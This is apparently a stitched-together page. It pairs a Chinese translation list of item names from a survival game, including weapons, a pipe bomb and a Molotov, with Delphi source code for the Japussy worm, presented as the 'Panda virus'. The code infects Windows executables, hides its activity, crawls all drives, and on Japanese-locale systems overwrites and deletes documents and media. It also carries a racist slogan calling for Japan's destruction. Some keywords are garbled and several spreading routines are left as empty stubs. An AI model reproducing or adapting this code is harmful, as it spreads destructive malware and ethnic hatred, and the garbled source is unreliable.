AlcoholedCottonBalls 酒精棉球
bandage 繃帶
RippedSheets 破布
Pills 止痛藥
PillsVitamins 維他命
pillsAntiDep 抗憂郁藥
PillsSleepingTablets 安眠藥
PillsBeta β-阻斷劑
WhiskeyFull 威士忌
Wine 夏墩埃酒
Bleach 漂白
Pot 鐵鍋
WaterPot 裝滿水的鐵鍋
WaterPopBottle 裝滿水的水瓶
Rice 米
Ramen 拉面
BeefJerky 牛肉干
Pickles 泡菜
JuiceBox 果汁盒
Crisps 1234 薯片
CookieJelly 果凍蛋糕
Cereal 妙脆角
Popcorn 爆米花
Chocolate 巧克力
Pop 123 汽水
Cupcake 紙杯蛋糕
Modjeska 硬糖
Candycane 糖果棒
ChickenFried 炸雞
Pizza 披薩
Pancake 煎餅
GrilledChee 奶酪三明治
Burger 漢堡
Waffles 烤松餅
Corn 玉米
Orange 橙子
Carrots 蘿卜
Cabbage 卷心菜
Leek 韭菜
BellPepper 甜椒
Broccoli
Chee 奶酪
Pepper 胡椒粉
Mustard 芥末
Butter 黃油
Honey 蜂蜜
Mugfulll
Ketchup 番茄醬
PeanutButter 花生醬 Sandwich 三明治
Peanut 花生
SunflowerSeeds 瓜子
Pie 派
Salt 鹽
Sugar 糖
Broccoli
Dough 面團
PieWholeRaw 生面團
CakeRaw 生蛋糕
Macandchee
DoughRolled 搟過的面團
BakingTrayBread 自己烘烤的面包
TinOpener 開罐器
TinnedSoup 罐裝湯
TunaTin 罐裝金槍魚
CannedChili
CannedBologne
CannedSardines
CannedCorn 罐裝玉米
CannedPeas 罐裝豆子
CannedTomato2 罐裝西紅柿
CannedPotato2 罐裝馬鈴薯
CannedSardines 罐裝沙丁魚
CannedCarrots2 罐裝蘿卜
CannedCornedBeef 罐裝腌牛肉
CannedMushroomSoup 罐裝真菌湯
CannedBologne 罐裝
CannedChili 罐裝堅果
OatsRaw 罐裝燕麥
EggCarton 蛋盒
CandyPackage 棒棒糖袋
Pineapple 菠蘿
DeadRat 死田鼠
DeadSquirrel 死松鼠
Frog 青蛙
FishingTackle 假餌 12
Catfish 鲇魚
Bass 巖鈍鱸魚 可切片
Perch 鱸魚
Crappie
Panfish 翻車魚
Pike 白斑狗魚
Trout 鱒魚
BaitFish 小魚
WildEggs 野雞蛋
Vinegar 食醋
Worm 蚯蚓
Cricket 蟋蟀
Grasshopper 螞蚱
NailsBox 釘盒
Glue 膠水
Rope 繩子
Twine 細繩
DuctTape 粘合膠帶
------------------------
BigHikingBag 大型登山包
Pistol 手槍
Shotgun 霰彈槍
HuntingRifle 獵槍
VarmintRifle 狩獵步槍
Molotov 燃燒彈
Bullets9mm 9mm子彈
ShotgunShells 霰彈槍子彈
223Bullets .223子彈
308Bullets .308子彈
BulletsBox 9mm子彈盒
ShotgunShellsBox 霰彈槍子彈盒
223Box .233子彈盒
308box .308子彈盒
IronSight 鐵瞄準器
x2Scope 2倍狙擊 x4 x8
AmmoStraps 子彈掛件
Sling 背帶
FiberglassStock 槍托
RecoilPad 后座緩沖墊
Lar 激光瞄準器
RedDot 紅點瞄準器
ChokeTubeFull 消焰管
ChokeTubeImproved 改良的消焰管
---------------------------------
CrodlessPhone 無繩電話
Generator 發(fā)電機
SmokeBomb 煙霧彈
PipeBomb 管狀炸藥
FlarmTrap 燃燒彈
PetrolCan 汽油桶
EmptyPetrolCan 空汽油桶
PropaneTank 煤氣罐
Charcoal 木炭

病毒什么樣子？什么顏色？幾個嘴?

下面是熊貓病毒的核心代碼，就是幾個英文字母的集合

program japussy;
us
windows, sysutils, class, graphics, shellapi{, registry};
const
headersize = 82432; //病毒體的大小
iconofft = $12eb8; //pe文件主圖標的偏移量

//在我的delphi5 sp1上面編譯得到的大小，其它版本的delphi可能不同
//查找2800000020的十六進制字符串可以找到主圖標的偏移量

{
headersize = 38912; //upx壓縮過病毒體的大小
iconofft = $92bc; //upx壓縮過pe文件主圖標的偏移量

//upx 1.24w 用法: upx -9 --8086 japussy.exe
}
iconsize = $2e8; //pe文件主圖標的大小--744字節(jié)
icontail = iconofft + iconsize; //pe文件主圖標的尾部
id = $44444444; //感染標記

//垃圾碼，以備寫入
catchword = 'if a race need to be killed out, it must be yamato. ' +
'if a country need to be destroyed, it must be japan! ' +
'*** w32.japussy.worm.a ***';
{$r *.res}
function registerrviceprocess(dwprocessid, dwtype: integer): integer;
stdcall; external 'kernel32.dll'; //函數(shù)聲明
var
tmpfile: string;
si: startupinfo;
pi: process_information;
isjap: boolean = fal; //日文操作系統(tǒng)標記
{ 判斷是否為win9x }
function iswin9x: boolean;
var
ver: tosversioninfo;
begin
result := fal;
ver.dwosversioninfosize := sizeof(tosversioninfo);
if not getversionex(ver) then
exit;
if (ver.dwplatformid = ver_platform_win32_windows) then //win9x
result := true;
end;
{ 在流之間復(fù)制 }
procedure copystream(src: tstream; sstartpos: integer; dst: tstream;
dstartpos: integer; count: integer);
var
scurpos, dcurpos: integer;
begin
scurpos := src.position;
dcurpos := dst.position;
src.ek(sstartpos, 0);
dst.ek(dstartpos, 0);
dst.copyfrom(src, count);
src.ek(scurpos, 0);
dst.ek(dcurpos, 0);
end;
{ 將宿主文件從已感染的pe文件中分離出來，以備使用 }
procedure extractfile(filename: string);
var
sstream, dstream: tfilestream;
begin
try
sstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone);
try
dstream := tfilestream.create(filename, fmcreate);
try
sstream.ek(headersize, 0); //跳過頭部的病毒部分
dstream.copyfrom(sstream, sstream.size - headersize);
finally
dstream.free;
end;
finally
sstream.free;
end;
except
end;
end;
{ 填充startupinfo結(jié)構(gòu) }
procedure fillstartupinfo(var si: startupinfo; state: word);
begin
si.cb := sizeof(si);
si.lprerved := nil;
si.lpdesktop := nil;
si.lptitle := nil;
si.dwflags := startf_ushowwindow;
si.wshowwindow := state;
si.cbrerved2 := 0;
si.lprerved2 := nil;
end;
{ 發(fā)帶毒郵件 }
procedure ndmail;
begin
//哪位仁兄愿意完成之？
end;
{ 感染pe文件 }
procedure infectonefile(filename: string);
var
hdrstream, srcstream: tfilestream;
icostream, dststream: tmemorystream;
iid: longint;
aicon: ticon;
infected, ispe: boolean;
i: integer;
buf: array[0..1] of char;
begin
try //出錯則文件正在被使用，退出
if comparetext(filename, 'japussy.exe') = 0 then //是自己則不感染
exit;
infected := fal;
ispe := fal;
srcstream := tfilestream.create(filename, fmopenread);
try
for i := 0 to $108 do //檢查pe文件頭
begin
srcstream.ek(i, sofrombeginning);
srcstream.read(buf, 2);
if (buf[0] = #80) and (buf[1] = #69) then //pe標記
begin
ispe := true; //是pe文件
break;
end;
end;
srcstream.ek(-4, sofromend); //檢查感染標記
srcstream.read(iid, 4);
if (iid = id) or (srcstream.size < 10240) then //太小的文件不感染
infected := true;
finally
srcstream.free;
end;
if infected or (not ispe) then //如果感染過了或不是pe文件則退出
exit;
icostream := tmemorystream.create;
dststream := tmemorystream.create;
try
aicon := ticon.create;
try
//得到被感染文件的主圖標(744字節(jié))，存入流
aicon.releahandle;
aicon.handle := extracticon(hinstance, pchar(filename), 0);
aicon.savetostream(icostream);
finally
aicon.free;
end;
srcstream := tfilestream.create(filename, fmopenread);
//頭文件
hdrstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone);
try
//寫入病毒體主圖標之前的數(shù)據(jù)
copystream(hdrstream, 0, dststream, 0, iconofft);
//寫入目前程序的主圖標
copystream(icostream, 22, dststream, iconofft, iconsize);
//寫入病毒體主圖標到病毒體尾部之間的數(shù)據(jù)
copystream(hdrstream, icontail, dststream, icontail, headersize - icontail);
//寫入宿主程序
copystream(srcstream, 0, dststream, headersize, srcstream.size);
//寫入已感染的標記
dststream.ek(0, 2);
iid := $44444444;
dststream.write(iid, 4);
finally
hdrstream.free;
end;
finally
srcstream.free;
icostream.free;
dststream.savetofile(filename); //替換宿主文件
dststream.free;
end;
except;
end;
end;
{ 將目標文件寫入垃圾碼后刪除 }
procedure smashfile(filename: string);
var
filehandle: integer;
i, size, mass, max, len: integer;
begin
try
tfileattributes(pchar(filename), 0); //去掉只讀屬性
filehandle := fileopen(filename, fmopenwrite); //打開文件
try
size := getfilesize(filehandle, nil); //文件大小
i := 0;
randomize;
max := random(15); //寫入垃圾碼的隨機次數(shù)
if max < 5 then
max := 5;
mass := size div max; //每個間隔塊的大小
len := length(catchword);
while i < max do
begin
fileek(filehandle, i * mass, 0); //定位
//寫入垃圾碼，將文件徹底破壞掉
filewrite(filehandle, catchword, len);
inc(i);
end;
finally
fileclo(filehandle); //關(guān)閉文件
end;
deletefile(pchar(filename)); //刪除之
except
end;
end;
{ 獲得可寫的驅(qū)動器列表 }
function getdrives: string;
var
disktype: word;
d: char;
str: string;
i: integer;
begin
for i := 0 to 25 do //遍歷26個字母
begin
d := chr(i + 65);
str := d + ':\';
disktype := getdrivetype(pchar(str));
//得到本地磁盤和網(wǎng)絡(luò)盤
if (disktype = drive_fixed) or (disktype = drive_remote) then
result := result + d;
end;
end;
{ 遍歷目錄，感染和摧毀文件 }
procedure loopfiles(path, mask: string);
var
i, count: integer;
fn, ext: string;
subdir: tstrings;
archrec: tarchrec;
msg: tmsg;
function isvaliddir(archrec: tarchrec): integer;
begin
if (archrec.attr <> 16) and (archrec.name <> '.') and
(archrec.name <> '..') then
result := 0 //不是目錄
el if (archrec.attr = 16) and (archrec.name <> '.') and
(archrec.name <> '..') then
result := 1 //不是根目錄
el result := 2; //是根目錄
end;
begin
if (findfirst(path + mask, faanyfile, archrec) = 0) then
begin
repeat
peekmessage(msg, 0, 0, 0, pm_remove); //調(diào)整消息隊列，避免引起懷疑
if isvaliddir(archrec) = 0 then
begin
fn := path + archrec.name;
ext := upperca(extractfileext(fn));
if (ext = '.exe') or (ext = '.scr') then
begin
infectonefile(fn); //感染可執(zhí)行文件
end
el if (ext = '.htm') or (ext = '.html') or (ext = '.asp') then
begin
//感染html和asp文件，將ba64編碼后的病毒寫入
//感染瀏覽此網(wǎng)頁的所有用戶
//哪位大兄弟愿意完成之？
end
el if ext = '.wab' then //outlook地址簿文件
begin
//獲取outlook郵件地址
end
el if ext = '.adc' then //foxmail地址自動完成文件
begin
//獲取foxmail郵件地址
end
el if ext = 'ind' then //foxmail地址簿文件
begin
//獲取foxmail郵件地址
end
el
begin
if isjap then //是倭文操作系統(tǒng)
begin
if (ext = '.doc') or (ext = '.xls') or (ext = '.mdb') or
(ext = '.mp3') or (ext = '.rm') or (ext = '.ra') or
(ext = '.wma') or (ext = '.zip') or (ext = '.rar') or
(ext = '.mpeg') or (ext = '.asf') or (ext = '.jpg') or
(ext = '.jpeg') or (ext = '.gif') or (ext = '.swf') or
(ext = '.pdf') or (ext = '.chm') or (ext = '.avi') then
smashfile(fn); //摧毀文件
end;
end;
end;
//感染或刪除一個文件后睡眠200毫秒，避免cpu占用率過高引起懷疑
sleep(200);
until (findnext(archrec) <> 0);
end;
findclo(archrec);
subdir := tstringlist.create;
if (findfirst(path + '*.*', fadirectory, archrec) = 0) then
begin
repeat
if isvaliddir(archrec) = 1 then
subdir.add(archrec.name);
until (findnext(archrec) <> 0);
end;
findclo(archrec);
count := subdir.count - 1;
for i := 0 to count do
loopfiles(path + subdir.strings + '\', mask);
freeandnil(subdir);
end;
{ 遍歷磁盤上所有的文件 }
procedure infectfiles;
var
driverlist: string;
i, len: integer;
begin
if getacp = 932 then //日文操作系統(tǒng)
isjap := true; //去死吧！
driverlist := getdrives; //得到可寫的磁盤列表
len := length(driverlist);
while true do //死循環(huán)
begin
for i := len downto 1 do //遍歷每個磁盤驅(qū)動器
loopfiles(driverlist + ':\', '*.*'); //感染之
ndmail; //發(fā)帶毒郵件
sleep(1000 * 60 * 5); //睡眠5分鐘
end;
end;
{ 主程序開始 }
begin
if iswin9x then //是win9x
registerrviceprocess(getcurrentprocessid, 1) //注冊為服務(wù)進程
el //winnt
begin
//遠程線程映射到explorer進程
//哪位兄臺愿意完成之？
end;
//如果是原始病毒體自己
if comparetext(extractfilename(paramstr(0)), 'japussy.exe') = 0 then
infectfiles //感染和發(fā)郵件
el //已寄生于宿主程序上了，開始工作
begin
tmpfile := paramstr(0); //創(chuàng)建臨時文件
delete(tmpfile, length(tmpfile) - 4, 4);
tmpfile := tmpfile + #32 + '.exe'; //真正的宿主文件，多一個空格
extractfile(tmpfile); //分離之
fillstartupinfo(si, sw_showdefault);
createprocess(pchar(tmpfile), pchar(tmpfile), nil, nil, true,
0, nil, '.', si, pi); //創(chuàng)建新進程運行之
infectfiles; //感染和發(fā)郵件
end;
end.